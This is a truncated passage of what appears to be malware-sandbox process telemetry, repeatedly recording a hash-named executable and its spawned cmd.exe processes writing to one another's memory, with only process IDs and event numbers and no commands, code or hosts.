d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1137 PID 1116 wrote to memory of 1800 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1137 PID 1116 wrote to memory of 1800 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1137 PID 1800 wrote to memory of 1952 1800 cmd.exe 1139 PID 1800 wrote to memory of 1952 1800 cmd.exe 1139 PID 1800 wrote to memory of 1952 1800 cmd.exe 1139 PID 1800 wrote to memory of 1952 1800 cmd.exe 1139 PID 1800 wrote to memory of 1892 1800 cmd.exe 1140 PID 1800 wrote to memory of 1892 1800 cmd.exe 1140 PID 1800 wrote to memory of 1892 1800 cmd.exe 1140 PID 1800 wrote to memory of 1892 1800 cmd.exe 1140 PID 1800 wrote to memory of 220 1800 cmd.exe 1141 PID 1800 wrote to memory of 220 1800 cmd.exe 1141 PID 1800 wrote to memory of 220 1800 cmd.exe 1141 PID 1800 wrote to memory of 220 1800 cmd.exe 1141 PID 220 wrote to memory of 1404 220 cmd.exe 1142 PID 220 wrote to memory of 1404 220 cmd.exe 1142 PID 220 wrote to memory of 1404 220 cmd.exe 1142 PID 220 wrote to memory of 1404 220 cmd.exe 1142 PID 1800 wrote to memory of 224 1800 cmd.exe 1143 PID 1800 wrote to memory of 224 1800 cmd.exe 1143 PID 1800 wrote to memory of 224 1800 cmd.exe 1143 PID 1800 wrote to memory of 224 1800 cmd.exe 1143 PID 1116 wrote to memory of 1904 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1144 PID 1116 wrote to memory of 1904 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1144 PID 1116 wrote to memory of 1904 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1144 PID 1116 wrote to memory of 1904 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1144 PID 1904 wrote to memory of 932 1904 cmd.exe 1146 PID 1904 wrote to memory of 932 1904 cmd.exe 1146 PID 1904 wrote to memory of 932 1904 cmd.exe 1146 PID 1904 wrote to memory of 932 1904 cmd.exe 1146 PID 1904 wrote to memory of 1772 1904 cmd.exe 1147 PID 1904 wrote to memory of 1772 1904 cmd.exe 1147 PID 1904 wrote to memory of 1772 1904 cmd.exe 1147 PID 1904 wrote to memory of 1772 1904 cmd.exe 1147 PID 1904 wrote to memory of 916 1904 cmd.exe 1148 PID 1904 wrote to memory of 916 1904 cmd.exe 1148 PID 1904 wrote to memory of 916 1904 cmd.exe 1148 PID 1904 wrote to memory of 916 1904 cmd.exe 1148 PID 916 wrote to memory of 484 916 cmd.exe 1149 PID 916 wrote to memory of 484 916 cmd.exe 1149 PID 916 wrote to memory of 484 916 cmd.exe 1149 PID 916 wrote to memory of 484 916 cmd.exe 1149 PID 1904 wrote to memory of 1424 1904 cmd.exe 1150 PID 1904 wrote to memory of 1424 1904 cmd.exe 1150 PID 1904 wrote to memory of 1424 1904 cmd.exe 1150 PID 1904 wrote to memory of 1424 1904 cmd.exe 1150 PID 1116 wrote to memory of 1840 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1151 PID 1116 wrote to memory of 1840 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1151 PID 1116 wrote to memory of 1840 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1151 PID 1116 wrote to memory of 1840 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1151 PID 1840 wrote to memory of 972 1840 cmd.exe 1153 PID 1840 wrote to memory of 972 1840 cmd.exe 1153 PID 1840 wrote to memory of 972 1840 cmd.exe 1153 PID 1840 wrote to memory of 972 1840 cmd.exe 1153 PID 1840 wrote to memory of 212 1840 cmd.exe 1154 PID 1840 wrote to memory of 212 1840 cmd.exe 1154 PID 1840 wrote to memory of 212 1840 cmd.exe 1154 PID 1840 wrote to memory of 212 1840 cmd.exe 1154 PID 1840 wrote to memory of 1128 1840 cmd.exe 1155 PID 1840 wrote to memory of 1128 1840 cmd.exe 1155 PID 1840 wrote to memory of 1128 1840 cmd.exe 1155 PID 1840 wrote to memory of 1128 1840 cmd.exe 1155 PID 1128 wrote to memory of 928 1128 cmd.exe 1156 PID 1128 wrote to memory of 928 1128 cmd.exe 1156 PID 1128 wrote to memory of 928 1128 cmd.exe 1156 PID 1128 wrote to memory of 928 1128 cmd.exe 1156 PID 1840 wrote to memory of 864 1840 cmd.exe 1157 PID 1840 wrote to memory of 864 1840 cmd.exe 1157 PID 1840 wrote to memory of 864 1840 cmd.exe 1157 PID 1840 wrote to memory of 864 1840 cmd.exe 1157 PID 1116 wrote to memory of 1580 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1158 PID 1116 wrote to memory of 1580 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1158 PID 1116 wrote to memory of 1580 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1158 PID 1116 wrote to memory of 1580 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1158 PID 1580 wrote to memory of 1344 1580 cmd.exe 1160 PID 1580 wrote to memory of 1344 1580 cmd.exe 1160 PID 1580 wrote to memory of 1344 1580 cmd.exe 1160 PID 1580 wrote to memory of 1344 1580 cmd.exe 1160 PID 1580 wrote to memory of 220 1580 cmd.exe 1161 PID 1580 wrote to memory of 220 1580 cmd.exe 1161 PID 1580 wrote to memory of 220 1580 cmd.exe 1161 PID 1580 wrote to memory of 220 1580 cmd.exe 1161 PID 1580 wrote to memory of 1808 1580 cmd.exe 1162 PID 1580 wrote to memory of 1808 1580 cmd.exe 1162 PID 1580 wrote to memory of 1808 1580 cmd.exe 1162 PID 1580 wrote to memory of 1808 1580 cmd.exe 1162 PID 1808 wrote to memory of 1896 1808 cmd.exe 1163 PID 1808 wrote to memory of 1896 1808 cmd.exe 1163 PID 1808 wrote to memory of 1896 1808 cmd.exe 1163 PID 1808 wrote to memory of 1896 1808 cmd.exe 1163 PID 1580 wrote to memory of 940 1580 cmd.exe 1164 PID 1580 wrote to memory of 940 1580 cmd.exe 1164 PID 1580 wrote to memory of 940 1580 cmd.exe 1164 PID 1580 wrote to memory of 940 1580 cmd.exe 1164 PID 1116 wrote to memory of 1324 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1165 PID 1116 wrote to memory of 1324 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1165 PID 1116 wrote to memory of 1324 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1165 PID 1116 wrote to memory of 1324 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1165 PID 1324 wrote to memory of 236 1324 cmd.exe 1167 PID 1324 wrote to memory of 236 1324 cmd.exe 1167 PID 1324 wrote to memory of 236 1324 cmd.exe 1167 PID 1324 wrote to memory of 236 1324 cmd.exe 1167 PID 1324 wrote to memory of 916 1324 cmd.exe 1168 PID 1324 wrote to memory of 916 1324 cmd.exe 1168 PID 1324 wrote to memory of 916 1324 cmd.exe 1168 PID 1324 wrote to memory of 916 1324 cmd.exe 1168 PID 1324 wrote to memory of 1608 1324 cmd.exe 1169 PID 1324 wrote to memory of 1608 1324 cmd.exe 1169 PID 1324 wrote to memory of 1608 1324 cmd.exe 1169 PID 1324 wrote to memory of 1608 1324 cmd.exe 1169 PID 1608 wrote to memory of 216 1608 cmd.exe 1170 PID 1608 wrote to memory of 216 1608 cmd.exe 1170 PID 1608 wrote to memory of 216 1608 cmd.exe 1170 PID 1608 wrote to memory of 216 1608 cmd.exe 1170 PID 1324 wrote to memory of 1204 1324 cmd.exe 1171 PID 1324 wrote to memory of 1204 1324 cmd.exe 1171 PID 1324 wrote to memory of 1204 1324 cmd.exe 1171 PID 1324 wrote to memory of 1204 1324 cmd.exe 1171 PID 1116 wrote to memory of 972 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1172 PID 1116 wrote to memory of 972 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1172 PID 1116 wrote to memory of 972 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1172 PID 1116 wrote to memory of 972 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1172 PID 972 wrote to memory of 1236 972 cmd.exe 1174 PID 972 wrote to memory of 1236 972 cmd.exe 1174 PID 972 wrote to memory of 1236 972 cmd.exe 1174 PID 972 wrote to memory of 1236 972 cmd.exe 1174 PID 972 wrote to memory of 1376 972 cmd.exe 1175 PID 972 wrote to memory of 1376 972 cmd.exe 1175 PID 972 wrote to memory of 1376 972 cmd.exe 1175 PID 972 wrote to memory of 1376 972 cmd.exe 1175 PID 972 wrote to memory of 280 972 cmd.exe 1176 PID 972 wrote to memory of 280 972 cmd.exe 1176 PID 972 wrote to memory of 280 972 cmd.exe 1176 PID 972 wrote to memory of 280 972 cmd.exe 1176 PID 280 wrote to memory of 864 280 cmd.exe 1177 PID 280 wrote to memory of 864 280 cmd.exe 1177 PID 280 wrote to memory of 864 280 cmd.exe 1177 PID 280 wrote to memory of 864 280 cmd.exe 1177 PID 972 wrote to memory of 1912 972 cmd.exe 1178 PID 972 wrote to memory of 1912 972 cmd.exe 1178 PID 972 wrote to memory of 1912 972 cmd.exe 1178 PID 972 wrote to memory of 1912 972 cmd.exe 1178 PID 1116 wrote to memory of 1860 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1179 PID 1116 wrote to memory of 1860 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1179 PID 1116 wrote to memory of 1860 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1179 PID 1116 wrote to memory of 1860 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1179 PID 1860 wrote to memory of 1800 1860 cmd.exe 1181 PID 1860 wrote to memory of 1800 1860 cmd.exe 1181 PID 1860 wrote to memory of 1800 1860 cmd.exe 1181 PID 1860 wrote to memory of 1800 1860 cmd.exe 1181 PID 1860 wrote to memory of 1896 1860 cmd.exe 1182 PID 1860 wrote to memory of 1896 1860 cmd.exe 1182 PID 1860 wrote to memory of 1896 1860 cmd.exe 1182 PID 1860 wrote to memory of 1896 1860 cmd.exe 1182 PID 1860 wrote to memory of 1168 1860 cmd.exe 1183 PID 1860 wrote to memory of 1168 1860 cmd.exe 1183 PID 1860 wrote to memory of 1168 1860 cmd.exe 1183 PID 1860 wrote to memory of 1168 1860 cmd.exe 1183 PID 1168 wrote to memory of 1096 1168 cmd.exe 1184 PID 1168 wrote to memory of 1096 1168 cmd.exe 1184 PID 1168 wrote to memory of 1096 1168 cmd.exe 1184 PID 1168 wrote to memory of 1096 1168 cmd.exe 1184 PID 1860 wrote to memory of 900 1860 cmd.exe 1185 PID 1860 wrote to memory of 900 1860 cmd.exe 1185 PID 1860 wrote to memory of 900 1860 cmd.exe 1185 PID 1860 wrote to memory of 900 1860 cmd.exe 1185 PID 1116 wrote to memory of 1752 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1186 PID 1116 wrote to memory of 1752 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1186 PID 1116 wrote to memory of 1752 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1186 PID 1116 wrote to memory of 1752 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1186 PID 1752 wrote to memory of 1904 1752 cmd.exe 1188 PID 1752 wrote to memory of 1904 1752 cmd.exe 1188 PID 1752 wrote to memory of 1904 1752 cmd.exe 1188 PID 1752 wrote to memory of 1904 1752 cmd.exe 1188 PID 1752 wrote to memory of 216 1752 cmd.exe 1189 PID 1752 wrote to memory of 216 1752 cmd.exe 1189 PID 1752 wrote to memory of 216 1752 cmd.exe 1189 PID 1752 wrote to memory of 216 1752 cmd.exe 1189 PID 1752 wrote to memory of 1080 1752 cmd.exe 1190 PID 1752 wrote to memory of 1080 1752 cmd.exe 1190 PID 1752 wrote to memory of 1080 1752 cmd.exe 1190 PID 1752 wrote to memory of 1080 1752 cmd.exe 1190 PID 1080 wrote to memory of 232 1080 cmd.exe 1191 PID 1080 wrote to memory of 232 1080 cmd.exe 1191 PID 1080 wrote to memory of 232 1080 cmd.exe 1191 PID 1080 wrote to memory of 232 1080 cmd.exe 1191 PID 1752 wrote to memory of 1876 1752 cmd.exe 1192 PID 1752 wrote to memory of 1876 1752 cmd.exe 1192 PID 1752 wrote to memory of 1876 1752 cmd.exe 1192 PID 1752 wrote to memory of 1876 1752 cmd.exe 1192 PID 1116 wrote to memory of 928 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1193 PID 1116 wrote to memory of 928 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1193 PID 1116 wrote to memory of 928 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1193 PID 1116 wrote to memory of 928 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1193 PID 928 wrote to memory of 2016 928 cmd.exe 1195 PID 928 wrote to memory of 2016 928 cmd.exe 1195 PID 928 wrote to memory of 2016 928 cmd.exe 1195 PID 928 wrote to memory of 2016 928 cmd.exe 1195 PID 928 wrote to memory of 864 928 cmd.exe 1196 PID 928 wrote to memory of 864 928 cmd.exe 1196 PID 928 wrote to memory of 864 928 cmd.exe 1196 PID 928 wrote to memory of 864 928 cmd.exe 1196 PID 928 wrote to memory of 1404 928 cmd.exe 1197 PID 928 wrote to memory of 1404 928 cmd.exe 1197 PID 928 wrote to memory of 1404 928 cmd.exe 1197 PID 928 wrote to memory of 1404 928 cmd.exe 1197 PID 1404 wrote to memory of 228 1404 cmd.exe 1198 PID 1404 wrote to memory of 228 1404 cmd.exe 1198 PID 1404 wrote to memory of 228 1404 cmd.exe 1198 PID 1404 wrote to memory of 228 1404 cmd.exe 1198 PID 928 wrote to memory of 1528 928 cmd.exe 1199 PID 928 wrote to memory of 1528 928 cmd.exe 1199 PID 928 wrote to memory of 1528 928 cmd.exe 1199 PID 928 wrote to memory of 1528 928 cmd.exe 1199 PID 1116 wrote to memory of 896 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1200 PID 1116 wrote to memory of 896 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1200 PID 1116 wrote to memory of 896 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1200 PID 1116 wrote to memory of 896 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1200 PID 896 wrote to memory of 208 896 cmd.exe 1202 PID 896 wrote to memory of 208 896 cmd.exe 1202 PID 896 wrote to memory of 208 896 cmd.exe 1202 PID 896 wrote to memory of 208 896 cmd.exe 1202 PID 896 wrote to memory of 1096 896 cmd.exe 1203 PID 896 wrote to memory of 1096 896 cmd.exe 1203 PID 896 wrote to memory of 1096 896 cmd.exe 1203 PID 896 wrote to memory of 1096 896 cmd.exe 1203 PID 896 wrote to memory of 1888 896 cmd.exe 1204 PID 896 wrote to memory of 1888 896 cmd.exe 1204 PID 896 wrote to memory of 1888 896 cmd.exe 1204 PID 896 wrote to memory of 1888 896 cmd.exe 1204 PID 1888 wrote to memory of 900 1888 cmd.exe 1205 PID 1888 wrote to memory of 900 1888 cmd.exe 1205 PID 1888 wrote to memory of 900 1888 cmd.exe 1205 PID 1888 wrote to memory of 900 1888 cmd.exe 1205 PID 896 wrote to memory of 1756 896 cmd.exe 1206 PID 896 wrote to memory of 1756 896 cmd.exe 1206 PID 896 wrote to memory of 1756 896 cmd.exe 1206 PID 896 wrote to memory of 1756 896 cmd.exe 1206 PID 1116 wrote to memory of 1372 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1207 PID 1116 wrote to memory of 1372 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1207 PID 1116 wrote to memory of 1372 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1207 PID 1116 wrote to memory of 1372 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1207 PID 1372 wrote to memory of 204 1372 cmd.exe 1209 PID 1372 wrote to memory of 204 1372 cmd.exe 1209 PID 1372 wrote to memory of 204 1372 cmd.exe 1209 PID 1372 wrote to memory of 204 1372 cmd.exe 1209 PID 1372 wrote to memory of 232 1372 cmd.exe 1210 PID 1372 wrote to memory of 232 1372 cmd.exe 1210 PID 1372 wrote to memory of 232 1372 cmd.exe 1210 PID 1372 wrote to memory of 232 1372 cmd.exe 1210 PID 1372 wrote to memory of 212 1372 cmd.exe 1211 PID 1372 wrote to memory of 212 1372 cmd.exe 1211 PID 1372 wrote to memory of 212 1372 cmd.exe 1211 PID 1372 wrote to memory of 212 1372 cmd.exe 1211 PID 212 wrote to memory of 1772 212 cmd.exe 1212 PID 212 wrote to memory of 1772 212 cmd.exe 1212 PID 212 wrote to memory of 1772 212 cmd.exe 1212 PID 212 wrote to memory of 1772 212 cmd.exe 1212 PID 1372 wrote to memory of 916 1372 cmd.exe 1213 PID 1372 wrote to memory of 916 1372 cmd.exe 1213 PID 1372 wrote to memory of 916 1372 cmd.exe 1213 PID 1372 wrote to memory of 916 1372 cmd.exe 1213 PID 1116 wrote to memory of 964 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1214 PID 1116 wrote to memory of 964 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1214 PID 1116 wrote to memory of 964 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1214 PID 1116 wrote to memory of 964 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1214 PID 964 wrote to memory of 1512 964 cmd.exe 1216 PID 964 wrote to memory of 1512 964 cmd.exe 1216 PID 964 wrote to memory of 1512 964 cmd.exe 1216 PID 964 wrote to memory of 1512 964 cmd.exe 1216 PID 964 wrote to memory of 228 964 cmd.exe 1217 PID 964 wrote to memory of 228 964 cmd.exe 1217 PID 964 wrote to memory of 228 964 cmd.exe 1217 PID 964 wrote to memory of 228 964 cmd.exe 1217 PID 964 wrote to memory of 524 964 cmd.exe 1218 PID 964 wrote to memory of 524 964 cmd.exe 1218 PID 964 wrote to memory of 524 964 cmd.exe 1218 PID 964 wrote to memory of 524 964 cmd.exe 1218 PID 524 wrote to memory of 1528 524 cmd.exe 1219 PID 524 wrote to memory of 1528 524 cmd.exe 1219 PID 524 wrote to memory of 1528 524 cmd.exe 1219 PID 524 wrote to memory of 1528 524 cmd.exe 1219 PID 964 wrote to memory of 968 964 cmd.exe 1220 PID 964 wrote to memory of 968 964 cmd.exe 1220 PID 964 wrote to memory of 968 964 cmd.exe 1220 PID 964 wrote to memory of 968 964 cmd.exe 1220 PID 1116 wrote to memory of 940 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1221 PID 1116 wrote to memory of 940 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1221 PID 1116 wrote to memory of 940 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1221 PID 1116 wrote to memory of 940 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1221 PID 940 wrote to memory of 1344 940 cmd.exe 1223 PID 940 wrote to memory of 1344 940 cmd.exe 1223 PID 940 wrote to memory of 1344 940 cmd.exe 1223 PID 940 wrote to memory of 1344 940 cmd.exe 1223 PID 940 wrote to memory of 900 940 cmd.exe 1224 PID 940 wrote to memory of 900 940 cmd.exe 1224 PID 940 wrote to memory of 900 940 cmd.exe 1224 PID 940 wrote to memory of 900 940 cmd.exe 1224 PID 940 wrote to memory of 236 940 cmd.exe 1225 PID 940 wrote to memory of 236 940 cmd.exe 1225 PID 940 wrote to memory of 236 940 cmd.exe 1225 PID 940 wrote to memory of 236 940 cmd.exe 1225 PID 236 wrote to memory of 484 236 cmd.exe 1226 PID 236 wrote to memory of 484 236 cmd.exe 1226 PID 236 wrote to memory of 484 236 cmd.exe 1226 PID 236 wrote to memory of 484 236 cmd.exe 1226 PID 940 wrote to memory of 932 940 cmd.exe 1227 PID 940 wrote to memory of 932 940 cmd.exe 1227 PID 940 wrote to memory of 932 940 cmd.exe 1227 PID 940 wrote to memory of 932 940 cmd.exe 1227 PID 1116 wrote to memory of 1204 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1228 PID 1116 wrote to memory of 1204 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1228 PID 1116 wrote to memory of 1204 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1228 PID 1116 wrote to memory of 1204 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1228 PID 1204 wrote to memory of 1424 1204 cmd.exe 1230 PID 1204 wrote to memory of 1424 1204 cmd.exe 1230 PID 1204 wrote to memory of 1424 1204 cmd.exe 1230 PID 1204 wrote to memory of 1424 1204 cmd.exe 1230 PID 1204 wrote to memory of 1772 1204 cmd.exe 1231 PID 1204 wrote to memory of 1772 1204 cmd.exe 1231 PID 1204 wrote to memory of 1772 1204 cmd.exe 1231 PID 1204 wrote to memory of 1772 1204 cmd.exe 1231 PID 1204 wrote to memory of 1236 1204 cmd.exe 1232 PID 1204 wrote to memory of 1236 1204 cmd.exe 1232 PID 1204 wrote to memory of 1236 1204 cmd.exe 1232 PID 1204 wrote to memory of 1236 1204 cmd.exe 1232 PID 1236 wrote to memory of 1984 1236 cmd.exe 1233 PID 1236 wrote to memory of 1984 1236 cmd.exe 1233 PID 1236 wrote to memory of 1984 1236 cmd.exe 1233 PID 1236 wrote to memory of 1984 1236 cmd.exe 1233 PID 1204 wrote to memory of 216 1204 cmd.exe 1234 PID 1204 wrote to memory of 216 1204 cmd.exe 1234 PID 1204 wrote to memory of 216 1204 cmd.exe 1234 PID 1204 wrote to memory of 216 1204 cmd.exe 1234 PID 1116 wrote to memory of 1912 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1235 PID 1116 wrote to memory of 1912 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1235 PID 1116 wrote to memory of 1912 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1235 PID 1116 wrote to memory of 1912 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1235 PID 1912 wrote to memory of 1412 1912 cmd.exe 1237 PID 1912 wrote to memory of 1412 1912 cmd.exe 1237 PID 1912 wrote to memory of 1412 1912 cmd.exe 1237 PID 1912 wrote to memory of 1412 1912 cmd.exe 1237 PID 1912 wrote to memory of 1528 1912 cmd.exe 1238 PID 1912 wrote to memory of 1528 1912 cmd.exe 1238 PID 1912 wrote to memory of 1528 1912 cmd.exe 1238 PID 1912 wrote to memory of 1528 1912 cmd.exe 1238 PID 1912 wrote to memory of 1800 1912 cmd.exe 1239 PID 1912 wrote to memory of 1800 1912 cmd.exe 1239 PID 1912 wrote to memory of 1800 1912 cmd.exe 1239 PID 1912 wrote to memory of 1800 1912 cmd.exe 1239 PID 1800 wrote to memory of 1260 1800 cmd.exe 1240 PID 1800 wrote to memory of 1260 1800 cmd.exe 1240 PID 1800 wrote to memory of 1260 1800 cmd.exe 1240 PID 1800 wrote to memory of 1260 1800 cmd.exe 1240 PID 1912 wrote to memory of 864 1912 cmd.exe 1241 PID 1912 wrote to memory of 864 1912 cmd.exe 1241 PID 1912 wrote to memory of 864 1912 cmd.exe 1241 PID 1912 wrote to memory of 864 1912 cmd.exe 1241 PID 1116 wrote to memory of 1860 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1242 PID 1116 wrote to memory of 1860 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1242 PID 1116 wrote to memory of 1860 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1242 PID 1116 wrote to memory of 1860 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1242 PID 1860 wrote to memory of 1780 1860 cmd.exe 1244 PID 1860 wrote to memory of 1780 1860 cmd.exe 1244 PID 1860 wrote to memory of 1780 1860 cmd.exe 1244 PID 1860 wrote to memory of 1780 1860 cmd.exe 1244 PID 1860 wrote to memory of 848 1860 cmd.exe 1245 PID 1860 wrote to memory of 848 1860 cmd.exe 1245 PID 1860 wrote to memory of 848 1860 cmd.exe 1245 PID 1860 wrote to memory of 848 1860 cmd.exe 1245 PID 1860 wrote to memory of 680 1860 cmd.exe 1246 PID 1860 wrote to memory of 680 1860 cmd.exe 1246 PID 1860 wrote to memory of 680 1860 cmd.exe 1246 PID 1860 wrote to memory of 680 1860 cmd.exe 1246 PID 680 wrote to memory of 932 680 cmd.exe 1247 PID 680 wrote to memory of 932 680 cmd.exe 1247 PID 680 wrote to memory of 932 680 cmd.exe 1247 PID 680 wrote to memory of 932 680 cmd.exe 1247 PID 1860 wrote to memory of 1168 1860 cmd.exe 1248 PID 1860 wrote to memory of 1168 1860 cmd.exe 1248 PID 1860 wrote to memory of 1168 1860 cmd.exe 1248 PID 1860 wrote to memory of 1168 1860 cmd.exe 1248 PID 1116 wrote to memory of 1816 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1249 PID 1116 wrote to memory of 1816 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1249 PID 1116 wrote to memory of 1816 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1249 PID 1116 wrote to memory of 1816 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1249 PID 1816 wrote to memory of 1960 1816 cmd.exe 1251 PID 1816 wrote to memory of 1960 1816 cmd.exe 1251 PID 1816 wrote to memory of 1960 1816 cmd.exe 1251 PID 1816 wrote to memory of 1960 1816 cmd.exe 1251 PID 1816 wrote to memory of 1128 1816 cmd.exe 1252 PID 1816 wrote to memory of 1128 1816 cmd.exe 1252 PID 1816 wrote to memory of 1128 1816 cmd.exe 1252 PID 1816 wrote to memory of 1128 1816 cmd.exe 1252 PID 1816 wrote to memory of 1952 1816 cmd.exe 1253 PID 1816 wrote to memory of 1952 1816 cmd.exe 1253 PID 1816 wrote to memory of 1952 1816 cmd.exe 1253 PID 1816 wrote to memory of 1952 1816 cmd.exe 1253 PID 1952 wrote to memory of 216 1952 cmd.exe 1254 PID 1952 wrote to memory of 216 1952 cmd.exe 1254 PID 1952 wrote to memory of 216 1952 cmd.exe 1254 PID 1952 wrote to memory of 216 1952 cmd.exe 1254 PID 1816 wrote to memory of 1080 1816 cmd.exe 1255 PID 1816 wrote to memory of 1080 1816 cmd.exe 1255 PID 1816 wrote to memory of 1080 1816 cmd.exe 1255 PID 1816 wrote to memory of 1080 1816 cmd.exe 1255 PID 1116 wrote to memory of 292 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1256 PID 1116 wrote to memory of 292 1116 